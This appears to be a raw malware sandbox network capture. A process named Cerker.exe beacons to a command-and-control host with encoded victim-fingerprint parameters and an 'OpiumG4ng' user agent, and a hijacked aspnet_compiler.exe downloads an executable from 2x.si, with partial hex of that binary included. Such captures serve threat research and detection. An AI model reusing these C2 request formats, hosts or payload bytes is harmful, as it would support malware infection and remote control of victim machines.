2024-08-31 20:42:21 UTC	362	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9ADF HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
2024-08-31 20:42:21 UTC	682	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZPhfL837LmtzlnEUUlWy2Q49JxGBJe62SwYoCR55D4zK3ceLL0mLlErsrmr1ViL3K1mrlMDiV%2FP1MSdsMk8Dk4gX3X87KWr7uKiHJVluT0hQgBRXSKFv7EgFrJwCxSSG4V9oL8uX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd8bac878421b-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:21 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49783	188.114.96.3	443	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:25 UTC	362	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD1 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
2024-08-31 20:42:26 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BMgWdrqmcnHDmRGTcsI%2FKSRBYub6IFV2yvx4aWNcfuXTS4BVcuXLtrvAZnX68HWgppGrLYoUPuF0zzTjwkepfMnkdfQjtyqCmq1AQ6vXb8T5YHsT0Jznndce3M70sKAoKqV4aAO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd8d80c758c11-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:26 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49785	188.114.96.3	443	8176	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:26 UTC	362	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD1 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
2024-08-31 20:42:27 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4DlhK8JrsoKGnlihZ3tQbCkBg2XOOBOOiCOMaH1YOa4g2ymbuy9v6fwgt3tuBQtCiBIhkUS2MjjATYK65G9d%2By4XftGkEnuYyTy%2F2J3abKiFoMUyMiWMlNxYXkFlk9Rcn9LM860C"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd8dea9280f60-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:27 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49786	188.114.96.3	443	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:26 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
2024-08-31 20:42:27 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ivGof1o0MaAOMD4H9K7xsc6h5HQBCuU%2BYloDKIePTae8Bu%2BLhuKAM4DBC6UG8fhKlo0GPzGJS1P4kINXzhsm8%2Fyh6prD7wfjLSbV7N%2B61512xMyzmFnVaFrjq7PVMgxdPYI%2BBGJN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd8df2d394358-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:27 UTC	109	IN	Data Raw: 36 37 0d 0a 35 66 39 61 64 30 37 30 35 62 34 35 39 38 30 61 30 61 63 37 66 30 61 35 39 64 66 31 30 66 38 64 62 62 39 61 30 32 38 66 30 63 32 31 35 33 61 30 36 37 39 62 63 36 34 34 33 66 37 61 61 36 61 33 62 37 37 61 38 64 36 32 63 32 63 34 61 33 63 61 36 65 38 61 32 35 37 65 36 38 34 39 33 30 35 33 33 61 65 35 0a 4f 4b 0d 0a Data Ascii: 675f9ad0705b45980a0ac7f0a59df10f8dbb9a028f0c2153a0679bc6443f7aa6a3b77a8d62c2c4a3ca6e8a257e684930533ae5OK
2024-08-31 20:42:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49792	188.114.96.3	443	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:29 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
2024-08-31 20:42:30 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jsXtSs19vkVKnh4xhRaLmr%2F5b6PGn4qrI%2Foz1eZ4qGUHMYM%2FWhwgZAFkbtkE62%2FBpiQRw1oBquaeixkbMyZMVqBeK339xmDNUtvIZzfMpYJQvt%2FFs6WUqtiYEtlUa%2BhpaqT6c195"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd8f14abc0cb5-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:30 UTC	109	IN	Data Raw: 36 37 0d 0a 35 66 39 61 64 30 37 30 35 62 34 35 39 38 30 61 30 61 63 37 66 30 61 35 39 64 66 31 30 66 38 64 62 62 39 61 30 32 38 66 30 63 32 31 35 33 61 30 36 37 39 62 63 36 34 34 33 66 37 61 61 36 61 33 62 37 37 61 38 64 36 32 63 32 63 34 61 33 63 61 36 65 38 61 32 35 37 65 36 38 34 39 33 30 35 33 33 61 65 35 0a 4f 4b 0d 0a Data Ascii: 675f9ad0705b45980a0ac7f0a59df10f8dbb9a028f0c2153a0679bc6443f7aa6a3b77a8d62c2c4a3ca6e8a257e684930533ae5OK
2024-08-31 20:42:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49793	188.114.96.3	443	8176	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:29 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
2024-08-31 20:42:30 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mSNCIumIj7WqEVVC5QtAxc6Iep1%2FW2Zp6%2B36OuL2HU0ShB7jKRuoRY%2FZkElPz%2BK6mpm64NB%2FW0yyU5yJL8Uy3Wsj1lSqd%2Fu6QHEO%2B93GuzIpjqbfNtjA2kYvzyiZtidUsC926Vlp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd8f168ca43e7-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:30 UTC	109	IN	Data Raw: 36 37 0d 0a 35 66 39 61 64 30 37 30 35 62 34 35 39 38 30 61 30 61 63 37 66 30 61 35 39 64 66 31 30 66 38 64 62 62 39 61 30 32 38 66 30 63 32 31 35 33 61 30 36 37 39 62 63 36 34 34 33 66 37 61 61 36 61 33 62 37 37 61 38 64 36 32 63 32 63 34 61 33 63 61 36 65 38 61 32 35 37 65 36 38 34 39 33 30 35 33 33 61 65 35 0a 4f 4b 0d 0a Data Ascii: 675f9ad0705b45980a0ac7f0a59df10f8dbb9a028f0c2153a0679bc6443f7aa6a3b77a8d62c2c4a3ca6e8a257e684930533ae5OK
2024-08-31 20:42:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49799	188.114.96.3	443	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:32 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
2024-08-31 20:42:33 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mnJcRgTEFnw20AgDBA9QHWzh8%2F6SA3Mbj27AjZlUtRjQhCm4%2B4j9JSwFCA5nc9P78M3ARbgnk%2Bpr76s98mW7TDjoZIrn%2F5X3HvS3lndsIa%2B8Z%2B1sfYW0848DCc5P1eCg4sQ4%2BJ4o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd903cd375589-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:33 UTC	109	IN	Data Raw: 36 37 0d 0a 35 66 39 61 64 30 37 30 35 62 34 35 39 38 30 61 30 61 63 37 66 30 61 35 39 64 66 31 30 66 38 64 62 62 39 61 30 32 38 66 30 63 32 31 35 33 61 30 36 37 39 62 63 36 34 34 33 66 37 61 61 36 61 33 62 37 37 61 38 64 36 32 63 32 63 34 61 33 63 61 36 65 38 61 32 35 37 65 36 38 34 39 33 30 35 33 33 61 65 35 0a 4f 4b 0d 0a Data Ascii: 675f9ad0705b45980a0ac7f0a59df10f8dbb9a028f0c2153a0679bc6443f7aa6a3b77a8d62c2c4a3ca6e8a257e684930533ae5OK
2024-08-31 20:42:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49800	188.114.96.3	443	8176	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:33 UTC	362	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD0 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
2024-08-31 20:42:34 UTC	680	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGxzMGCn5HAnXkx2WYxHJfVRoVAlmOX7KfyFSrM7HV0n5Lfwjs9FAVXN6JtQuPnou68ENqbw87jnZ4Ud8tdRihbWJ2yyDKO4jTcqNmVIRPQfUuPbZCqmzHv5yNaGJEynSWGDEvhW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd90a2b5842c6-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:34 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49803	172.67.143.156	443	4628	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:34 UTC	62	OUT	GET /vGW.exe HTTP/1.1 Host: 2x.si Connection: Keep-Alive
2024-08-31 20:42:34 UTC	679	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:34 GMT Content-Type: application/octet-stream Content-Length: 550912 Connection: close etag: "66d34aa3-86800" last-modified: Sat, 31 Aug 2024 16:53:55 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kmcgqZbDWkZaUDh7pElqr0tDIK8sgfXYhLjENa62NoOfVrHPB6rrsOOP63vOp2tYqbchsUk4eo3Cp4imIxPrxxdcPeqkIa%2B%2FTExO2lOKYhgYSW%2FeQK6MVg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd90cca6d8c54-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:34 UTC	690	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 41 fd 6e b8 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 ac 02 00 00 ba 05 00 00 00 00 00 ce ca 02 00 00 20 00 00 00 e0 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELAn0 @ @
2024-08-31 20:42:34 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e5 44 7e a2 00 3b b2 00 b0 5d e9 31 8f f9 93 21 48 bb c8 07 4e 8e 49 90 ab 4e 96 97 1e 65 cc 46 b4 f4 58 0b fb 1c 17 06 56 3a 1c a3 d5 fc f3 1a 29 ab ce 5d 22 d2 dc 66 53 5a a6 7b 66 15 c6 9f f4 a7 50 51 41 65 53 7e 17 a4 c3 1a 27 5e 96 3a ab 6b cb 3b 9d 45 f1 1f fa 58 ab ac e3 03 93 4b 30 fa 55 20 76 6d f6 ad cc 76 91 88 02 4c 25 f5 e5 d7 fc 4f 2a cb d7 c5 35 44 80 26 62 a3 8f b5 b1 5a 49 de ba 1b 67 25 ea 0e 98 45 fe c0 e1 5d 2f 75 02 c3 4c f0 12 81 46 97 a3 8d d3 f9 c6 6b 8f 5f e7 03 92 9c 95 15 6d 7a eb bf 52 59 da 95 be 83 2d d4 74 21 d3 58 e0 69 29 49 c9 c8 44 8e c2 89 6a 75 8e 79 78 f4 58 3e 6b 99 b9 71 dd 27 e1 4f b6 be 88 ad 17 f0 20 ac 66 c9 ce 3a b4 7d df Data Ascii: D~;]1!HNINeFXV:)]"fSZ{fPQAeS~'^:k;EXK0U vmvL%O*5D&bZIg%E]/uLFk_mzRY-t!Xi)IDjuyxX>kq'O f:}
2024-08-31 20:42:34 UTC	1369	IN	Data Raw: 0e aa 18 be 1b fc 56 3e 4b c6 d2 79 20 9a db c0 fe 78 cd 5a f4 1f dd a8 33 88 07 c7 31 b1 12 10 59 27 80 ec 5f 60 51 7f a9 19 b5 4a 0d 2d e5 7a 9f 93 c9 9c ef a0 e0 3b 4d ae 2a f5 b0 c8 eb bb 3c 83 53 99 61 17 2b 04 7e ba 77 d6 26 e1 69 14 63 55 21 0c 7d a5 54 85 f2 d2 9b 13 82 74 71 0f 1f 69 47 5f 7e 0d f7 5a 75 b8 c4 92 ab b8 a3 6f 51 90 2b 72 6a 97 4f d0 ec b1 62 7a cb 38 6b d3 72 bc d2 1a a8 a5 c6 63 63 84 f8 7c 7c 99 ee 77 77 8d f6 7b 7b 0d ff f2 f2 bd d6 6b 6b b1 de 6f 6f 54 91 c5 c5 50 60 30 30 03 02 01 01 a9 ce 67 67 7d 56 2b 2b 19 e7 fe fe 62 b5 d7 d7 e6 4d ab ab 9a ec 76 76 45 8f ca ca 9d 1f 82 82 40 89 c9 c9 87 fa 7d 7d 15 ef fa fa eb b2 59 59 c9 8e 47 47 0b fb f0 f0 ec 41 ad ad 67 b3 d4 d4 fd 5f a2 a2 ea 45 af af bf 23 9c 9c f7 53 a4 a4 96 e4 Data Ascii: V>Ky xZ31Y'_`QJ-z;M*<Sa+~w&icU!}TtqiG_~ZuoQ+rjObz8krcc\|\|ww{{kkooTP`00gg}V++bMvvE@}}YYGGAg_E#S
2024-08-31 20:42:34 UTC	1369	IN	Data Raw: c5 2a cb d7 26 35 44 80 b5 62 a3 8f de b1 5a 49 25 ba 1b 67 45 ea 0e 98 5d fe c0 e1 c3 2f 75 02 81 4c f0 12 8d 46 97 a3 6b d3 f9 c6 03 8f 5f e7 15 92 9c 95 bf 6d 7a eb 95 52 59 da d4 be 83 2d 58 74 21 d3 49 e0 69 29 8e c9 c8 44 75 c2 89 6a f4 8e 79 78 99 58 3e 6b 27 b9 71 dd be e1 4f b6 f0 88 ad 17 c9 20 ac 66 7d ce 3a b4 63 df 4a 18 e5 1a 31 82 97 51 33 60 62 53 7f 45 b1 64 77 e0 bb 6b ae 84 fe 81 a0 1c f9 08 2b 94 70 48 68 58 8f 45 fd 19 94 de 6c 87 52 7b f8 b7 ab 73 d3 23 72 4b 02 e2 e3 1f 8f 57 66 55 ab 2a b2 eb 28 07 2f b5 c2 03 86 c5 7b 9a d3 37 08 a5 30 28 87 f2 23 bf a5 b2 02 03 6a ba ed 16 82 5c 8a cf 1c 2b a7 79 b4 92 f3 07 f2 f0 4e 69 e2 a1 65 da f4 cd 06 05 be d5 d1 34 62 1f c4 a6 fe 8a 34 2e 53 9d a2 f3 55 a0 05 8a e1 32 a4 f6 eb 75 0b 83 ec Data Ascii: &5DbZI%gE]/uLFk_mzRY-Xt!Ii)DujyxX>k'qO f}:cJ1Q3`bSEdwk+pHhXElR{s#rKWfU(/{70(#j\+yNie4b4.SU2u
2024-08-31 20:42:34 UTC	1369	IN	Data Raw: 5b 9b c0 b7 c2 75 b7 fd 1c e1 fd 93 ae 3d 93 26 6a 4c 26 36 5a 6c 36 3f 41 7e 3f f7 02 f5 f7 cc 4f 83 cc 34 5c 68 34 a5 f4 51 a5 e5 34 d1 e5 f1 08 f9 f1 71 93 e2 71 d8 73 ab d8 31 53 62 31 15 3f 2a 15 04 0c 08 04 c7 52 95 c7 23 65 46 23 c3 5e 9d c3 18 28 30 18 96 a1 37 96 05 0f 0a 05 9a b5 2f 9a 07 09 0e 07 12 36 24 12 80 9b 1b 80 e2 3d df e2 eb 26 cd eb 27 69 4e 27 b2 cd 7f b2 75 9f ea 75 09 1b 12 09 83 9e 1d 83 2c 74 58 2c 1a 2e 34 1a 1b 2d 36 1b 6e b2 dc 6e 5a ee b4 5a a0 fb 5b a0 52 f6 a4 52 3b 4d 76 3b d6 61 b7 d6 b3 ce 7d b3 29 7b 52 29 e3 3e dd e3 2f 71 5e 2f 84 97 13 84 53 f5 a6 53 d1 68 b9 d1 00 00 00 00 ed 2c c1 ed 20 60 40 20 fc 1f e3 fc b1 c8 79 b1 5b ed b6 5b 6a be d4 6a cb 46 8d cb be d9 67 be 39 4b 72 39 4a de 94 4a 4c d4 98 4c 58 e8 b0 58 Data Ascii: [u=&jL&6Zl6?A~?O4\h4Q4qqs1Sb1?*R#eF#^(07/6$=&'iN'uu,tX,.4-6nnZZ[RR;Mv;a}){R)>/q^/SSh, `@ y[[jjFg9Kr9JJLLXX
2024-08-31 20:42:34 UTC	1369	IN	Data Raw: e2 22 a0 96 a1 72 d6 30 6c f2 9d d2 72 d7 06 10 49 fc 86 f6 6f 22 32 49 81 ce a9 ee 9e 61 67 89 13 32 0c f5 65 f6 2f cb 93 27 41 00 45 00 53 00 00 00 b0 33 55 7d 7d 9b 18 0d a9 4c c1 59 a9 97 de 09 29 aa 9e 2f 52 4b 6d 00 7c 99 cc e0 5c 74 ee 35 85 1b 80 df 8a 53 30 69 50 cf 5c 34 3c 1d f7 ae 78 ab 80 14 8b 11 9e 4d c4 04 b6 13 f2 6f 8d 36 fb 37 11 51 b4 c6 e0 b9 bb d4 97 23 08 c4 7b 9c 3b bf b4 a6 11 ef e0 bd c1 cc a8 5f 29 5e 37 7a 37 3d b8 0e e9 f8 b3 89 31 e3 20 fb 4a 12 dd ce 11 77 1c b1 08 a4 36 11 6d 0a b0 fc 6f 55 6a c9 a6 25 6c 27 63 91 31 52 2e dd d7 94 7c a4 2a 99 b4 b3 86 9e ab d9 4a 21 1a 82 29 8d a4 d9 8d 18 1c ef 1b b1 21 4e 9c 3e b0 5d e8 34 89 9c c6 05 74 5a 89 bb 32 12 0b fb 33 e5 db 9f 7d 89 d1 33 df 8a 7f c1 f5 df 45 55 6e d3 67 2f 1d Data Ascii: "r0lrIo"2Iag2e/'AES3U}}LY)/RKm\|\t5S0iP\4<xMo67Q#{;_)^7z7=1 Jw6moUj%l'c1R.\|*J!)!N>]4tZ23}3EUng/
2024-08-31 20:42:34 UTC	1369	IN	Data Raw: 80 35 93 25 86 44 a6 1f b2 f3 0e f8 4c 44 97 3e 00 0c dd 36 e9 f6 02 e7 cc 8f 04 79 11 d7 93 54 72 28 c6 86 c0 63 c5 bb 5c 82 58 86 8a c6 a7 7d 10 03 70 97 35 23 1f 56 c7 d8 5c 65 70 13 72 69 a2 42 87 2c 21 9d 91 6b 51 a5 57 3e 8c 55 a0 b7 50 7b 74 21 4a 0f a9 85 2e 1d a7 1f fc 73 b0 6c 0d aa da 3e cd 3c db 9f cb b7 02 1f 01 87 07 d8 87 6b a9 0b 55 38 81 5e 10 b6 94 0e 49 8a 42 38 6b 62 db 29 93 f8 8f cb 46 6c 12 56 e4 1e 1d f1 0b 74 e1 15 b8 e2 c2 d3 d2 15 96 a0 90 58 cf 47 8e 32 b6 bb 8c 81 3c 0b 37 d0 66 43 91 93 02 d0 bb e5 43 74 1e 88 7d a7 41 25 62 d3 c1 5a 79 ab 77 73 31 38 d2 b9 b0 d7 b8 6d dc 74 88 ac 91 c1 32 50 6c f6 41 1f 51 4c 47 39 a8 51 e2 b1 00 9d 05 dc 1b c8 aa 66 cf 1c 82 a6 ce b2 50 96 d1 ab e4 ac 4d bf 3e 14 1c 74 1c 87 af 5c 85 34 6d Data Ascii: 5%DLD>6yTr(c\X}p5#V\epriB,!kQW>UP{t!J.sl><kU8^IB8kb)FlVtXG2<7fCCt}A%bZyws18mt2PlAQLG9QfPM>t\4m
2024-08-31 20:42:34 UTC	1369	IN	Data Raw: f9 e2 59 0e d6 bd 83 6c b6 a2 54 9c 19 bb 63 28 34 b8 42 9f 80 4a fa cb 9c 7e da bb 24 ec 62 33 1a 48 e0 9e 92 2f e0 cc 94 40 5c c4 29 52 a0 aa 75 08 e1 97 54 e8 ca 7c 28 fe 8b a5 76 cd 06 29 f3 ae c8 21 c4 57 22 da 61 8f 91 93 af dd 6a bb 79 11 2e 00 74 24 50 e0 9c 74 fc 4b 30 f5 db 37 4d 31 9f 79 05 41 4b a6 ee 41 f1 a4 14 23 9d 34 29 70 5a b0 b6 cf b0 93 b7 0d 7f 92 5e fa c2 2d 84 5b 06 26 93 55 cb 9c d0 e0 03 4a 64 74 1f 01 63 9a 50 17 ac ae 99 a0 13 5e 9e 22 61 76 1f db b4 32 8f 03 f4 94 a9 cc 54 77 11 97 a0 75 e9 ea eb 41 ba b6 7c 18 d1 42 ea e9 ed 4a ea 19 d3 d5 a2 88 06 54 8e 85 a8 12 23 7e e0 52 2c 63 7d 12 2d 64 66 fc 6e 34 25 ca 8a df 07 59 46 22 57 63 1f 50 90 f4 52 a6 8b fd cb cd 51 79 34 cf a7 ee 80 02 ed 2e 